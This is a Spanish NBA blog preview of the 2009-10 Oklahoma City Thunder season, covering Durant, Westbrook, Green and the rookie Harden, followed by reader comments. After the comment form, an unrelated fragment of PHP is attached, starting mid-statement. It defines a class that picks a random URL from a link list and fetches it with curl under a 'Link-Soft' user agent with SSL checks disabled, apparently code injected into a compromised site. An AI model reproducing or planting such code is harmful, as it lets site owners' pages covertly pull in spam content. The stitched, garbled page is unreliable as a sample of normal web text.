Oklahoma City Thunder: Ya estoy aquí…

26 de October de 2009 por Queco

El año pasado al hacer este análisis reconocía tener algo de tirria a esta franquicia por haberse quedado con la plaza de los Supersonics, pero el equipo que han construído me ha hecho replantearme (algo) la situación. Han juntado probablemente la mayor cantidad de talento joven de toda la liga, y no sólo eso, sino que lo han hecho con bastante sentido. Y todo ello pese a iniciar la pasada temporada con un récord de 4 victorias y 29 derrotas, lo que provocó el cambio de técnico, y con ello una nueva racha de 19-30, más acorde a sus posibilidades.

Gran parte de este cambio deben agradecérselo a ciertas modificaciones que realizó el nuevo técnico, Scott Brooks, que lo vio muy claro: Kevin Durant es SF y no hay más que hablar, Jeff Green pasó a la posición de PF y Russell Westbrook se convirtió en el base titular indiscutible. La temporada sophomore de Durant fue sencillamente espectacular. 25’3 puntos, 6’5 rebotes y 2’8 asistencias son números de superestrella, y su progresión parece no tener límite. Y es que un alero “bajo” de 2’06 y una envergadura de alrededor de 2’30 con la capacidad de anotación que tiene este chico es para asustarse. Sus dos mejores escuderos son Jeff Green y Russell Westbrook, ambos jovencísimos también, ya que el primero incia su tercera temporada y el segundo afrontará su año sophomore. Sus números tampoco dejan lugar a dudas, 16’5 puntos y 6’7 rebotes para Green y 15 puntos 5 rebotes y otras tantas asistencias por partido para Westbrook. De ambos se espera que como poco mantengan el nivel, aunque lo lógico es que ambos mejoren, por su juventud e inexperiencia.

Claro, alguien que no haya visto nada de este equipo el año pasado pensará que cómo es posible que haya nombrado tres jugadores y los tres tengan excelentes números, y al mismo tiempo, el equipo haya sido de los peores de la liga. Uno de los mayores lastres de los Thunder la temporada pasada fue el juego exterior, las muchas pérdidas de balón, donde fueron los peores (o los “mejores”) de la liga, y el poco acierto en el tiro en general y para mejorar estos aspectos han drafteado a James Harden, un SG al que muchos comparan con Manu Ginobili, buen anotador, con una gran visión del juego,  y algo también muy importante, perfectamente preparado para asumir el salto a la NBA.

Otro problema que han tenido es su falta de intimidación en la pintura. Nick Collison era su mejor defensor interior, y tampoco es que meta mucho miedo el tío. A mitad de temporada incorporaron a Nenad Krstic, que es un buen pívot, con buena mano, muy buenos movimientos, pero que intimidador, intimidador, pues tampoco es. Así que en verano han fichado a Ethan Thomas, que quizá les de un puntito más ahí adentro, y al rookie BJ Mullens, que veremos lo que puede hacer aunque creo que le falta un poco de cuerpo aún para enfrentarse a los mastodontes que se mueven por las zonas de la NBA. Lo que realmente no creo que noten mucho es la baja de Robert Swift…

Completando la rotación estarán Thabo Sefolosha, que probablemente parta de SG titular, y Shaun Livingston, que sigue poco a poco, intentando ser el que prometía antes de la tremenda lesión de rodilla que sufrió.

Mi prónostico para este año es que mejorarán el récord del año anterior en unas 12 o 15 victorias, y que darán más de una sorpresa, o disgusto, según cómo se mire, pero aún les falta un poquito. Por hacer un resumen gráfico, me imagino a Kevin Durant, asomando su cabeza por una puerta destrozada a hachazos, la que conduce a los playoffs, y diciendo, como el gran Nicholson: “Ya estoy aquíiiiiiiii….” y a los 8 que lleguen atemorizados, pues sabrán que pronto los Thunder atravesarán esa puerta.

Quinteto titular: Westbrook, Sefolosha, Durant, Green, Krstic
Sexto hombre: Harden

Pronóstico: Fuera de Playoffs

Comenta

11 comentarios a esta entrada

  1. Bryan García dice:
    #1

    Serán una de las sorpresas agradables de esta temporada.
    Esperemos que la inexperiencia y la falta de jugadores sólidos desde el banquillo no le hagan caer en otra campaña como la anterior.

    Saludos!

      Citar

  2. luis dice:
    #2

    Hola!!! Soy,bueno era, seguidor de los Sonics de toda la vida y me pasa como a ti…empece odiando a este equipo pero Durant Green y Westbrook me han hecho recapacitar.
    No querria poner peros a tu analisis,muy correcto…pero si añadir la importancia que en este equipo en los ultimos años está teniendo Sam Presti. El año pasado muy poca gente confiaba en Westbrook en la eleccion tan alta de los Thunder( ex Sonics) y ha demostrado ser muy valido para la NBA. Este año casi nadie apuesta por Harden y estoy seguro de que algó tendrá si Sam le ha elegido. Veremos.

    Un saludo

      Citar

  3. Hakeem dice:
    #3

    Buenisima la descripción de Nicholson!!!
    y lo de Swift también xD
    Yo lo veo igual…El huracán Durant va a ser muy fuerte.Este tio va a ser un grande si no lo es ya,un all-star perenne estilo Garnett,LeBron,Kobe…
    Y encima añadimos a Green que tiene un margen de mejora increible y a Harden que añade los intaligibles y el juego en equipo…apaga y vamonos.
    Lo malo es que Westbrook es un escolta reconvertido…preferiria un base puro.
    Aún asi,dos años sin traspasos y a temblar con este equipo 🙂

      Citar

  4. NBA LAKERS BLOG dice:
    #4

    Excelente análisis. Este será, para mí, el equipo revelación.

    Los invitamos a que pasen a leer y opinar sobre la previa de la temporada. Durante hoy y mañana estaremos haciendo análisis de cada división, para darle un pantallazo general a la que será la temporada en que los Lakers intentarán defender su título ante grandes contendientes y otros no tanto…

    Pasense!

    ¡¡Y NO SE OLVIDEN QUE, COMO SIEMPRE, TRANSMITIREMOS EN VIVO DESDE NUESTRO BLOG EL JUEGO INAUGURAL, CON LA CEREMONIA DE LOS ANILLOS Y TODO EL PARTIDO ANTE LOS CLIPPERS!!

    Saludos!!

    NBA LAKERS BLOG!

      Citar

  5. sergio dice:
    #5

    Desde luego es uno de los equipos con mas futuro de la liga con Portland, NJ,….

    Un equipo con Harden, Westbrook, Durant, Green + un Pivot es algo para dar miedo dentro de unos años. Lastima de la falta de centimetros de Westbrook para defender a algunos escoltas altos de la liga. Defensivamente no son gran cosa, pero en un dia inspirado en ataque pueden hacerle daño a cualquier equipo de la liga. Contrataques de calidad y jugadores comprometidos alrededor de un lider, Durant, que es un anotador compulsivo de buenas cualidades fisicas. A mi me recuerda un poquito a Alex English, pero espero que llegue mas lejos colectivamente de lo que el lo hizo. Sera un equipo que apetezca ver, quizas no lleguen lejos (el Oeste lleva años teniendo mucho nivel para entrar en PO) pero creo que si estuvieran en el Este no les quitaban la postemporada….

      Citar

  6. sergio dice:
    #6

    Por cierto, ahora que lo pienso…, para el All-Star de este año puede ser que veamos a Gasol como pivot titular en el Oeste no? El año pasado creo recordar que aparecia como pivot puro y no como PF… como mucho se lo podria quitar Al Jefferson u Oden. Me parece que es el claro favorito, no?? Ademas, habiendo ganado un anillo habra subido su reconocimiento entre el publico americano. Ojala sea otro pasito mas para Pau.

      Citar

  7. Óscar dice:
    #7

    Creo que a Gasol lo incluían como PF, no Center como hace dos años, también para el 3º equipo ideal, que era PF. Este año, también, a no ser que recaiga Andy Bynum… Lo mismo pasa con Duncan, siempre Power Forward, incluso el año pasado era Bonner el “5” siempre, en TV y webs…

      Citar

  8. L.Casei dice:
    #8

    Vaya, Sergio, una cosa es que no tragues a McMillan y otra que pongas al mismo nivel a Portland que a Oklahoma City o New Jersey…. Futuro, sí, pero yo veo un poquito más de presente a los Blazers que a los Thunder o Nets… no sé, igual me equivoco.
    A ver si Rudy juega hoy…. por lo menos ya ha entrenado. Pau no juega vs. LAC.

      Citar

  9. sergio dice:
    #9

    No los estoy poniendo en un nivel parecido en la actualidad pero creo que, dentro de 3 o 4 años, los trios de jovenes que hay tanto en Portland (Aldridge, Roy, Oden) como en NJ (Harris, Brook Lopez, Douglas-Roberts y C.Lee) y Oklahoma (Westbrook, Durant, Green) van a ser grandisimos jugadores sobre los que asentar el proyecto… yo desde luego los veo como los que mas futuro tienen (quizas tambien equipos estilo Chicago)

    Todo ello sin contar con traspasos el año que viene, resultados y lesiones de aqui a esos 3 o 4 años.

      Citar

  10. sergi237 dice:
    #10

    es aqui donde se recogen owneds??

      Citar

  11. Txusma dice:
    #11

    Sin duda, la explosión de Durant ha sido mayor de lo esperado y no creo que nadie, viendo como se iniciaba el Oeste, les hubiera dado Playoffs a principio de temporada.

    Está todo el mundo repasando los pronósticos? 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>